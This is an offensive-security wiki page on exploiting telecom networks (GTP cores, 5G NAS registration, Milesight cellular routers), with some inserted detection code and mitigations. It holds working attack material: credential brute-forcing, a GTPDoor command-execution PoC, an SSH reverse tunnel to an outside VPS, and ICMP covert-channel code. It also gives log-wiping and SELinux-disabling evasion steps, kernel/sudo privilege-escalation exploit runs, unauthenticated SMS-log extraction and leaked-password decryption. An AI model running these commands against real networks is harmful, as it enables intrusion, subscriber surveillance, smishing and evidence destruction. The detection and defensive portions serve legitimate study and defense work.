Telecom Network Exploitation (GTP / Roaming Environments)

Reading time: 14 minutes

tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

note

Telecom core protocols (GPRS Tunnelling Protocol, GTP) frequently traverse the semi-trusted GRX/IPX roaming backbones. Because they run over plain UDP with almost no authentication, any foothold inside a telecom perimeter can usually reach core signalling planes directly. The following notes collect attack tricks observed in the field against SGSN/GGSN, PGW/SGW and other EPC nodes.

1. Recon & Initial Access

1.1 Default OSS / NE Accounts

A surprisingly large set of vendor-supplied network elements ship with hard-coded SSH/Telnet users such as root:admin, dbadmin:dbadmin, cacti:cacti, ftpuser:ftpuser, … A dedicated wordlist dramatically increases brute-force success:

bash
hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt

If the device only exposes a management VRF, pivot through a jump host first (see section 4.1 «sgsnemu + SOCKS5» below).

1.2 Host discovery inside GRX/IPX

Most GRX operators still allow ICMP echo across the backbone. Combine masscan with GTPv1 UDP probes (UDP 2123 is GTP-C) to quickly map GTP-C listeners:

bash
masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55

2. Enumerating Subscribers – cordscan

The following Go tool crafts GTP-C Create PDP Context Request packets and logs the responses. Each reply reveals the SGSN / MME currently serving the queried IMSI and, sometimes, the visited PLMN of the subscriber.

bash
# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan

# Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap

Important flags:

  • --imsi Target subscriber IMSI
  • --oper Home network / HNI (MCC+MNC)
  • -w Write raw packets to pcap

Key constants inside the binary can be patched to widen the scan:

pingtimeout       = 3   // seconds before giving up
pco               = 0x218080
common_tcp_ports  = "22,23,80,443,8080"

3. Code Execution over GTP – GTPDoor

GTPDoor is a small ELF service that listens on UDP 2123 and parses every incoming GTP-C packet. When a payload starts with a pre-shared tag, the remainder is decrypted (AES-128-CBC) and executed via /bin/sh -c. stdout/stderr is exfiltrated inside Echo Response messages, so no outbound session is ever created.

Minimal PoC packet (Python):

python
# gtpc is a hypothetical helper module that frames the blob inside a GTP-C Echo Request.
# AES-128 needs a 16-byte key: the original 15-byte "SixteenByteKey!" would make AES.new() raise ValueError.
from Crypto.Cipher import AES      # pip install pycryptodome
import gtpc
key = b"SixteenByteKey!!"          # exactly 16 bytes
cmd = b"id;uname -a"
# zero-IV CBC, command NUL-padded to a multiple of the 16-byte block size
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00" * 16).encrypt(cmd.ljust(32, b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))

Detection:

  • any host sending unbalanced Echo Requests (requests that never receive an Echo Response) to SGSN IPs
  • GTP version flag set to 1 while message type = 1 (Echo) – deviation from the spec
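The GTP-C framing and the detection logic above, as an added example that is not code from the original page nor from GTPDoor or cordscan: it builds and parses the GTPv1-C header defined in 3GPP TS 29.060 section 6 (Echo Request/Response use it with TEID 0), then runs two checks over constructed traffic, Echo Requests that never get an Echo Response (the GTPDoor beacon pattern) and Create PDP Context Requests coming from a host that is not a known SGSN. The addresses, sequence numbers and the MAG1C tag are constructed for the example.

```python
"""Added example (not from the original page or its tools): GTPv1-C header
build/parse plus the two GTP detections described on this page."""
import struct
from collections import defaultdict

GTP_ECHO_REQUEST = 1
GTP_ECHO_RESPONSE = 2
GTP_CREATE_PDP_REQ = 16
GTP_FLAGS_V1_PT_S = (1 << 5) | (1 << 4) | (1 << 1)   # version=1, PT=GTP, S=seq present -> 0x32

def build_gtpv1c(msg_type, teid=0, seq=0, payload=b""):
    """Mandatory 8-byte header + the 4 optional octets (seq, N-PDU, next ext) + payload.
    Length counts everything after the mandatory header; TEID is 0 for path management."""
    body = struct.pack("!HBB", seq, 0, 0) + payload
    return struct.pack("!BBHI", GTP_FLAGS_V1_PT_S, msg_type, len(body), teid) + body

def parse_gtpv1c(pkt):
    flags, msg_type, length, teid = struct.unpack("!BBHI", pkt[:8])
    body = pkt[8:8 + length]
    has_opt = bool(flags & 0x07)          # E, S or PN set -> all 4 optional octets present
    seq = struct.unpack("!H", body[:2])[0] if flags & 0x02 else None
    return {"version": flags >> 5, "type": msg_type, "teid": teid,
            "seq": seq, "payload": body[4:] if has_opt else body}

def unbalanced_echo_sources(flows, threshold=3):
    """flows: (src, dst, parsed) triples.  Returns (src, dst) pairs whose Echo
    Requests outnumber the Echo Responses coming back by at least threshold."""
    sent, answered = defaultdict(int), defaultdict(int)
    for src, dst, g in flows:
        if g["type"] == GTP_ECHO_REQUEST:
            sent[(src, dst)] += 1
        elif g["type"] == GTP_ECHO_RESPONSE:
            answered[(dst, src)] += 1          # key by the original requester
    return sorted(p for p, n in sent.items() if n - answered[p] >= threshold)

def rogue_pdp_initiators(flows, known_sgsns):
    """Detection idea 1: anything but an SGSN/GGSN sending Create PDP Context Request."""
    return sorted({src for src, _, g in flows
                   if g["type"] == GTP_CREATE_PDP_REQ and src not in known_sgsns})

# Constructed sample: one healthy SGSN<->GGSN echo pair, an implant beaconing
# GTPDoor-style tagged blobs at the SGSN, and the same implant probing the GGSN.
SGSN, GGSN, IMPLANT = "10.1.1.10", "10.1.1.100", "10.9.9.9"
SAMPLE = [
    (SGSN, GGSN, build_gtpv1c(GTP_ECHO_REQUEST, seq=1)),
    (GGSN, SGSN, build_gtpv1c(GTP_ECHO_RESPONSE, seq=1, payload=b"\x0e\x01")),   # Recovery IE
    (IMPLANT, GGSN, build_gtpv1c(GTP_CREATE_PDP_REQ, seq=2)),
] + [(IMPLANT, SGSN, build_gtpv1c(GTP_ECHO_REQUEST, seq=n, payload=b"MAG1C" + bytes(32)))
     for n in range(3)]

def analyse(sample=SAMPLE):
    flows = [(s, d, parse_gtpv1c(p)) for s, d, p in sample]
    return {"unbalanced_echo": unbalanced_echo_sources(flows),
            "rogue_pdp": rogue_pdp_initiators(flows, {SGSN})}

if __name__ == "__main__":
    print(analyse())
```

On real traffic the flows come from a pcap (UDP 2123 payloads keyed by IP pair); the threshold absorbs the occasional lost Echo Response between legitimate peers, while a host that only ever sends requests stands out immediately.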

4. Pivoting Kupitia Core

4.1 sgsnemu + SOCKS5

OsmoGGSN ships an SGSN emulator able to establish a PDP context towards a real GGSN/PGW. Once the negotiation completes, Linux receives a new tun interface (tun0) that is reachable from the roaming peer.

bash
# OsmoGGSN sgsnemu long options: --remote = GGSN/PGW, --listen = our own GTP source address,
# --createif brings up the local tun interface once the PDP context is accepted
sgsnemu --remote 10.1.1.100 --listen 10.1.1.10 --imsi 404995112345678 \
        --apn internet --contexts 1 --createif --debug
ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 &   # internal SOCKS proxy

With proper firewall hair-pinning, this tunnel bypasses signalling-only VLANs and lands you directly on the data plane.

4.2 SSH Reverse Tunnel over Port 53

DNS is almost always open in roaming infrastructure. Expose the internal SSH service on your VPS listening on :53 and come back to it later from home:

bash
ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com

Make sure GatewayPorts yes is enabled in the VPS sshd_config; otherwise the -R listener binds to loopback only.

5. Covert Channels

| Channel | Transport | Encoding | Notes |
|---|---|---|---|
| ICMP – EchoBackdoor | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | fully passive listener, no outbound traffic |
| DNS – NoDepDNS | UDP 53 | XOR (key = funnyAndHappy) encoded in A-record octets | watches the *.nodep sub-domain |
| GTP – GTPDoor | UDP 2123 | AES-128-CBC blob in private IE | blends in with legitimate GTP-C chatter |

All implants implement watchdogs that timestomp their binaries and re-spawn if crashed.
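The ICMP channel from the table, as an added example that is not EchoBackdoor's own code: a 4-byte key sent in the clear followed by 14-byte XOR-ed command chunks inside ICMP Echo packets, with the encoder an operator would use, the purely passive decoder an implant would run (the kernel keeps answering the pings, so nothing leaves the box), and the network-side check from «Detection ideas» item 4. The key, identifier and command are constructed.

```python
"""Added example (not the implant's code): EchoBackdoor-style ICMP covert
channel codec plus a detector for its payload fingerprint."""
import struct
from collections import Counter

CHUNK = 14
KEY = b"\xde\xad\xbe\xef"      # constructed 4-byte session key, carried in clear in every packet
ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY = 8, 0

def icmp_checksum(data):
    """RFC 1071 one's-complement sum; returns 0 when run over a packet with a valid checksum."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def xor(data, key):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def encode_command(cmd, key=KEY, ident=0x1337):
    """Operator side: one Echo Request per 14-byte chunk, ICMP seq = chunk index."""
    pkts = []
    for idx, off in enumerate(range(0, len(cmd), CHUNK)):
        payload = key + xor(cmd[off:off + CHUNK].ljust(CHUNK, b"\x00"), key)
        unchecked = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, idx) + payload
        csum = icmp_checksum(unchecked)
        pkts.append(struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, ident, idx) + payload)
    return pkts

def decode_stream(pkts):
    """Implant side: verify the checksum, take the key from the payload itself,
    reassemble chunks by seq, strip the NUL padding of the last chunk."""
    chunks = {}
    for p in pkts:
        typ, _, _, _, seq = struct.unpack("!BBHHH", p[:8])
        if typ != ICMP_ECHO_REQUEST or icmp_checksum(p) != 0 or len(p) != 8 + 4 + CHUNK:
            continue
        chunks[seq] = xor(p[12:], p[8:12])
    return b"".join(chunks[s] for s in sorted(chunks)).rstrip(b"\x00")

def echo_backdoor_candidates(pkts, min_pkts=2):
    """Network side: Echo Request/Reply with exactly an 18-byte payload whose first
    4 bytes repeat across a burst, and a non-zero identifier, is the channel's fingerprint.
    Returns the repeated 4-byte leads (i.e. the recovered session keys)."""
    leads = Counter()
    for p in pkts:
        typ, _, _, ident, _ = struct.unpack("!BBHHH", p[:8])
        if typ in (ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY) and ident and len(p) == 8 + 4 + CHUNK:
            leads[p[8:12]] += 1
    return [k for k, n in leads.items() if n >= min_pkts]

if __name__ == "__main__":
    frames = encode_command(b"id;uname -a")
    print(decode_stream(frames), echo_backdoor_candidates(frames))
```

Because the key travels in the first four payload bytes, a defender who matches the fingerprint can decode the commands straight from the capture, which is the weakness of XOR-with-inline-key designs and the reason the detector returns the leads rather than just a count.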

6. Defense Evasion Cheatsheet

bash
# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp

# Disable bash history
export HISTFILE=/dev/null

# Masquerade as kernel thread
echo 0 > /proc/$$/autogroup           # only resets the CFS autogroup nice value; it does not hide the process
printf 'kworker/1:0' > /proc/$$/comm   # comm name now shows as kworker/1:0 in top/ps (the original NUL write had no such effect;
                                       # /proc/$$/cmdline still reveals the real binary)

touch -r /usr/bin/time /usr/bin/chargen   # timestomp
setenforce 0                              # disable SELinux

7. Privilege Escalation on Legacy NE

bash
# DirtyCow – CVE-2016-5195
gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd

# PwnKit – CVE-2021-4034
python3 PwnKit.py

# Sudo Baron Samedit – CVE-2021-3156
python3 exploit_userspec.py

Cleanup tip:

bash
userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c

8. Toolbox

  • cordscan, GTPDoor, EchoBackdoor, NoDepDNS – custom tooling described in the previous sections.
  • FScan : intranet TCP sweeps (fscan -p 22,80,443 10.0.0.0/24)
  • Responder : LLMNR/NBT-NS rogue WPAD
  • Microsocks + ProxyChains : lightweight SOCKS5 pivoting
  • FRP (≥0.37) : NAT traversal / asset bridging

9. 5G NAS Registration Attacks: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay

5G registration runs over NAS (Non-Access Stratum) on top of NGAP. Until NAS security is activated by Security Mode Command/Complete, the initial messages are neither integrity protected nor ciphered. This pre-security window enables several attack paths whenever you can observe or modify N2 traffic (e.g., on-path inside the core, a rogue gNB, or a testbed).

Registration flow (abridged):

  • Registration Request: the UE sends its SUCI (encrypted SUPI) and capabilities.
  • Authentication: AMF/AUSF send RAND/AUTN; the UE returns RES*.
  • Security Mode Command/Complete: NAS integrity and ciphering are negotiated and activated.
  • PDU Session Establishment: IP/QoS setup.

Lab setup notes (non-RF):

  • Core: a default Open5GS configuration is enough to generate the flow.
  • UE: a simulator or a test UE; decode with Wireshark.
  • Active tooling: 5GReplay (capture/modify/replay NAS within NGAP), Sni5Gect (sniff/patch/inject NAS on the fly without bringing up a full rogue gNB).
  • Useful display filters (the names below are the ones the 5GReplay rule in 9.3 uses; current Wireshark builds expose the same fields as ngap.procedureCode and nas-5gs.mm.message_type, with 0x41 = 65 = Registration Request):
  • ngap.procedure_code == 15 (InitialUEMessage)
  • nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request)

9.1 Identity privacy: SUCI flaws that expose SUPI/IMSI

Expected: the UE/USIM must send a SUCI (the SUPI encrypted with the home-network public key). Seeing the SUPI/IMSI in cleartext in the Registration Request indicates a privacy flaw that enables long-term subscriber tracking.

How to test:

  • Capture the first NAS message inside InitialUEMessage and inspect the Mobile Identity IE.
  • Quick Wireshark check:
  • It should decode as SUCI, not IMSI.
  • Example filters: nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci should be present; its absence together with the presence of an imsi field indicates a leak.

What to collect:

  • MCC/MNC/MSIN if exposed; store per UE and track across time/location.

Mitigation:

  • Enforce a SUCI-only policy on UEs/USIMs; alert on any IMSI/SUPI seen in initial NAS.

9.2 Capability bidding-down to null algorithms (EEA0/EIA0)

Background:

  • The UE advertises the EEA (encryption) and EIA (integrity) algorithms it supports in the UE Security Capability IE of the Registration Request (in 5G the formal names are 5G-EA/5G-IA, also written NEA/NIA, with the same numbering).
  • Typical mapping: EEA1/EIA1 = SNOW 3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 are the null algorithms.

Problem:

  • Because the Registration Request is not integrity protected, an on-path attacker can clear the capability bits to force the selection of EEA0/EIA0 later during Security Mode Command. Some stacks incorrectly accept null algorithms outside emergency services.

Attack steps:

  • Intercept InitialUEMessage and modify the NAS UE Security Capability so that it advertises only EEA0/EIA0.
  • With Sni5Gect, hook the NAS message and patch the capability bits before forwarding it.
  • Observe whether the AMF accepts null ciphering/integrity and completes Security Mode with EEA0/EIA0.

Verification/visibility:

  • In Wireshark, confirm the selected algorithms after Security Mode Command/Complete.
  • Example passive sniffer output:
Encryption in use [EEA0]
Integrity in use [EIA0, EIA1, EIA2]
SUPI (MCC+MNC+MSIN) 9997000000001

Mitigations (required):

  • Configure the AMF/policy to reject EEA0/EIA0 except where strictly required (e.g., emergency calls).
  • Prefer enforcing EEA2/EIA2 as a minimum; log and alert on any NAS security context that negotiates null algorithms.

9.3 Replay of the initial Registration Request (pre-security NAS)

Because initial NAS has neither integrity protection nor freshness, a captured InitialUEMessage + Registration Request can be replayed to the AMF.

PoC rule for 5GReplay to forward matching replays:

xml
<beginning>
<property value="THEN"
property_id="101"
type_property="FORWARD"
description="Forward InitialUEMessage with Registration Request">

<!-- Trigger on NGAP InitialUEMessage (procedureCode == 15) -->
<event value="COMPUTE"
event_id="1"
description="Trigger: InitialUEMessage"
boolean_expression="ngap.procedure_code == 15"/>

<!-- Context match on NAS Registration Request (message_type == 65) -->
<event value="COMPUTE"
event_id="2"
description="Context: Registration Request"
boolean_expression="nas_5g.message_type == 65"/>

</property>
</beginning>

What to check:

  • Whether the AMF accepts the replay and proceeds to Authentication; a lack of freshness/context validation indicates a weakness.

Mitigation:

  • Enforce replay protection/context binding on the AMF; rate-limit and correlate per gNB/UE.
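The bidding-down edit from 9.2 and the replay signature from 9.3, as one added example that is not code from the original page, Open5GS, 5GReplay or Sni5Gect. It encodes and decodes the 5GS UE security capability IE carried in the unprotected Registration Request (3GPP TS 24.501 9.11.3.54: IEI 0x2E, then a length octet, then one octet of 5G-EA bits and one of 5G-IA bits, algorithm n sitting at bit 8-n so that bit 8 is the null algorithm), applies the bit-clearing an on-path attacker performs, shows how a weak and a hardened AMF policy react to it, and flags repeated InitialUEMessage contents from the same gNB. The AMF preference list, addresses and sample NAS bytes are constructed.

```python
"""Added example (not from the page or its tools): UE security capability IE
codec, the EEA0/EIA0 bidding-down edit, AMF-side policy and replay check."""
from collections import Counter

UE_SEC_CAP_IEI = 0x2E          # IEI of UE security capability in the Registration Request

def _octet(algs):
    """Algorithm numbers -> capability bitmap (algorithm n sits at bit 8-n)."""
    return sum(1 << (7 - a) for a in algs)

def _algs(octet):
    return [a for a in range(8) if octet & (1 << (7 - a))]

def encode_ue_sec_cap(ea, ia):
    """Minimal 2-octet form: IEI, length, EA bitmap, IA bitmap (EPS octets omitted)."""
    return bytes([UE_SEC_CAP_IEI, 2, _octet(ea), _octet(ia)])

def decode_ue_sec_cap(ie):
    if len(ie) < 4 or ie[0] != UE_SEC_CAP_IEI or ie[1] < 2:
        raise ValueError("not a UE security capability IE")
    return {"ea": _algs(ie[2]), "ia": _algs(ie[3])}

def bid_down(ie):
    """The on-path edit from 9.2: keep only the EA0/IA0 bits so nothing but null remains."""
    out = bytearray(ie)
    out[2] &= 0x80
    out[3] &= 0x80
    return bytes(out)

# Constructed AMF preference: AES first, then SNOW 3G, then ZUC; null only as a last resort
AMF_PREFERENCE = [2, 1, 3, 0]

def amf_select(ie, emergency=False, allow_null=False):
    """Pick EA/IA as an AMF would.  A hardened AMF (allow_null=False) never returns
    algorithm 0 outside emergency; a weak one (allow_null=True) falls back to it."""
    caps = decode_ue_sec_cap(ie)
    def pick(supported):
        for alg in AMF_PREFERENCE:
            if alg in supported and (alg != 0 or emergency or allow_null):
                return alg
        return None     # nothing acceptable -> Security Mode Reject / registration failure
    return {"ea": pick(caps["ea"]), "ia": pick(caps["ia"])}

def nas_security_alerts(ie, selection, emergency=False):
    """Checklist items from 9.5: null-only capabilities and null algorithms actually negotiated."""
    caps = decode_ue_sec_cap(ie)
    out = []
    if caps["ea"] == [0] or caps["ia"] == [0]:
        out.append("ue-caps-null-only")
    if (selection["ea"] == 0 or selection["ia"] == 0) and not emergency:
        out.append("null-algo-negotiated")
    if selection["ea"] is None or selection["ia"] is None:
        out.append("no-acceptable-algorithm")
    return out

def replay_suspects(events, min_repeats=2):
    """events: (gnb_ip, nas_bytes) per InitialUEMessage.  The same Registration Request
    bytes arriving again from the same gNB is the 9.3 replay signature."""
    seen = Counter(events)
    return sorted({gnb for (gnb, _), n in seen.items() if n >= min_repeats})

if __name__ == "__main__":
    ie = encode_ue_sec_cap([0, 1, 2, 3], [0, 1, 2])
    print(amf_select(ie), amf_select(bid_down(ie)), amf_select(bid_down(ie), allow_null=True))
```

A genuine UE retransmission also repeats the same bytes, so the replay threshold should be tuned against the RAN's NAS retry behaviour and correlated with the RAN-UE-NGAP-ID before anyone pages an on-call engineer.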

9.4 Tooling notes (reproducible)

  • Open5GS: bring up AMF/SMF/UPF to emulate the core; observe N2 (NGAP) and NAS.
  • Wireshark: validate NGAP/NAS decodes; use the filters above to isolate Registration.
  • 5GReplay: record a registration, then replay specific NGAP + NAS messages as the rule dictates.
  • Sni5Gect: live sniff/modify/inject NAS control-plane to force null algorithms or disrupt authentication sequences.

9.5 Defensive checklist

  • Continuously inspect Registration Requests for plaintext SUPI/IMSI; block offending devices/USIMs.
  • Reject EEA0/EIA0 except for narrowly defined emergency procedures; require at least EEA2/EIA2.
  • Detect rogue or misconfigured infrastructure: unauthorized gNB/AMF, unexpected N2 peers.
  • Alert on NAS security modes that end up with null algorithms or on frequent repetitions of InitialUEMessage.

10. Industrial Cellular Routers – Unauthenticated SMS API Abuse (Milesight UR5X/UR32/UR35/UR41) and Credential Recovery (CVE-2023-43261)

Abusing exposed web APIs of industrial cellular routers enables covert, high-volume smishing that originates from a legitimate carrier. Milesight UR-series routers expose a JSON-RPC-style endpoint at /cgi. When misconfigured, the API can be queried without authentication to enumerate the SMS inbox/outbox and, in some deployments, to send SMS.

Typical unauthenticated request (same shape for inbox and outbox):

http
POST /cgi HTTP/1.1
Host: <router>
Content-Type: application/json

{ "base": "query_outbox", "function": "query_outbox", "values": [ {"page":1,"per_page":50} ] }

Inbox variant of the body:

json
{ "base": "query_inbox", "function": "query_inbox", "values": [ {"page":1,"per_page":50} ] }

Responses include fields such as timestamp, content, phone_number (E.164), and status (success or failed). Repeated failed sends to the same number are often an attacker capability check, verifying that the router/SIM can deliver before blasting.

Example curl to exfiltrate SMS metadata:

bash
curl -sk -X POST http://<router>/cgi \
-H 'Content-Type: application/json' \
-d '{"base":"query_outbox","function":"query_outbox","values":[{"page":1,"per_page":100}]}'

Notes on auth artifacts:

  • Some traffic may include an auth cookie, but a large share of exposed devices answer query_inbox/query_outbox without any authentication at all when the management interface is reachable from the Internet.
  • In environments that do require auth, previously leaked credentials (see below) restore access.

Credential recovery path – CVE-2023-43261:

  • Affected families: UR5X, UR32L, UR32, UR35, UR41 (before v35.3.0.7).
  • Issue: web-served logs (e.g., httpd.log) are reachable without authentication under /lang/log/ and contain admin login events with the password encrypted using a hardcoded AES key/IV present in the client-side JavaScript.
  • Practical access and decrypt:
bash
curl -sk http://<router>/lang/log/httpd.log | sed -n '1,200p'
# Look for entries like: {"username":"admin","password":"<base64>"}

Minimal Python to decrypt the leaked passwords (AES-128-CBC, hardcoded key/IV):

python
import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
KEY=b'1111111111111111'; IV=b'2222222222222222'
enc_b64='...'  # value from httpd.log
print(unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(enc_b64)), AES.block_size).decode())

Monitoring and detection ideas (network):

  • Alert on unauthenticated POST /cgi whose JSON body has base/function set to query_inbox or query_outbox.
  • Track bursts of repeated POST /cgi followed by status":"failed" records for many different numbers from a single source IP (capability tests).
  • Inventory Internet-exposed Milesight routers; restrict management to VPN; disable SMS features unless required; upgrade to ≥ v35.3.0.7; rotate credentials and audit SMS logs for unknown sends.

Shodan/OSINT pivots (observed examples):

  • http.html:"rt_title" matches Milesight router panels.
  • Google dorking for exposed logs: "/lang/log/system" ext:log.

Operational impact: using legitimate carrier SIMs inside the router gives very high SMS deliverability/credibility for phishing, while the inbox/outbox exposure leaks sensitive metadata at scale.
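The two network-side detections above, as an added example that is not from the original report: it runs over constructed records of the kind a reverse proxy or IDS can reconstruct from POST /cgi (source IP, cookie header, JSON body) and over outbox entries in the shape query_outbox returns, flagging unauthenticated SMS-API calls, per-source bursts, and repeated failed sends to one number (the pre-blast deliverability probe). The IPs, numbers and thresholds are constructed.

```python
"""Added example (not from the original report): detections for unauthenticated
Milesight SMS-API use and capability probes, over constructed records."""
import json
from collections import defaultdict

SMS_FUNCTIONS = {"query_inbox", "query_outbox"}

def unauth_sms_api_calls(requests):
    """(src, function) for every POST /cgi that hits the SMS API without any auth cookie."""
    hits = []
    for r in requests:
        if r["method"] != "POST" or r["path"] != "/cgi":
            continue
        try:
            body = json.loads(r["body"])
        except (ValueError, TypeError):
            continue                      # not JSON-RPC at all; ignore
        fn = body.get("function", body.get("base"))
        if fn in SMS_FUNCTIONS and not r.get("cookie"):
            hits.append((r["src"], fn))
    return hits

def capability_probes(outbox, min_failed=3):
    """phone_number -> failed count for numbers that received repeated failed sends."""
    failed = defaultdict(int)
    for e in outbox:
        if e.get("status") == "failed":
            failed[e["phone_number"]] += 1
    return {n: c for n, c in failed.items() if c >= min_failed}

def api_bursts(requests, max_per_src=10):
    """Source IPs issuing more than max_per_src unauthenticated SMS-API calls."""
    per_src = defaultdict(int)
    for src, _ in unauth_sms_api_calls(requests):
        per_src[src] += 1
    return {s: n for s, n in per_src.items() if n > max_per_src}

# Constructed sample: an admin with a session cookie, an unauthenticated scraper,
# and an outbox with three failed sends to one number before a run of successes.
_Q = '{"base":"%s","function":"%s","values":[{"page":%d,"per_page":100}]}'
REQUESTS = [
    {"src": "192.0.2.10", "method": "POST", "path": "/cgi", "cookie": "session=abc",
     "body": _Q % ("query_inbox", "query_inbox", 1)},
    {"src": "198.51.100.7", "method": "POST", "path": "/cgi", "cookie": "",
     "body": _Q % ("query_outbox", "query_outbox", 1)},
    {"src": "198.51.100.7", "method": "POST", "path": "/cgi", "cookie": "",
     "body": _Q % ("query_inbox", "query_inbox", 1)},
    {"src": "198.51.100.7", "method": "POST", "path": "/cgi", "cookie": "", "body": "not json"},
]
OUTBOX = ([{"timestamp": "2024-01-01 10:0%d:00" % i, "content": "test",
            "phone_number": "+15550000001", "status": "failed"} for i in range(3)]
          + [{"timestamp": "2024-01-01 10:10:00", "content": "Your parcel ...",
              "phone_number": "+1555000%04d" % i, "status": "success"} for i in range(5)])

def analyse(requests=REQUESTS, outbox=OUTBOX):
    # max_per_src lowered to 1 so the small constructed sample trips the burst rule
    return {"unauth": unauth_sms_api_calls(requests),
            "probes": capability_probes(outbox),
            "bursts": api_bursts(requests, max_per_src=1)}

if __name__ == "__main__":
    print(analyse())
```

The cookie check is deliberately coarse: on these devices the question is whether the call carried any session at all, and an IDS that cannot see request bodies can still fall back on the burst rule alone.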


Detection ideas

  1. Any device other than an SGSN/GGSN initiating Create PDP Context Requests.
  2. Non-standard ports (53, 80, 443) receiving SSH handshakes from internal IPs.
  3. Frequent Echo Requests without matching Echo Responses – may indicate GTPDoor beacons.
  4. High-volume ICMP echo-reply traffic with large, non-zero identifiers/sequence numbers.
  5. 5G: InitialUEMessage carrying repeated NAS Registration Requests from identical endpoints (replay signal).
  6. 5G: NAS Security Mode negotiating EEA0/EIA0 outside an emergency context.
